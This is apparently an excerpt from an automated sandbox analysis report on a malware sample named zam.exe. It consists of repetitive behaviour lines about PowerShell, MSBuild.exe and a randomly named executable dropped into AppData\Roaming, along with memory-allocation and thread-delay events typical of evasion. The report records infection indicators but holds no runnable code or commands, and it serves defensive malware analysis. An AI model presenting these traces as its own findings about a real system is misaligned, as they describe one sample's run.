Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\zam.exe	Memory allocated: B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory allocated: 2620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory allocated: 4620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory allocated: 7060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory allocated: 6B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory allocated: 8060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory allocated: 9060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory allocated: 9560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory allocated: A560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Memory allocated: B560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: 3020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: 3230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: 3070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: 7770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: 8770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: 88F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: 98F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: 9FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Memory allocated: AFC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1660000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3160000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 30A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\zam.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596965	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596379	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596094	Jump to behavior
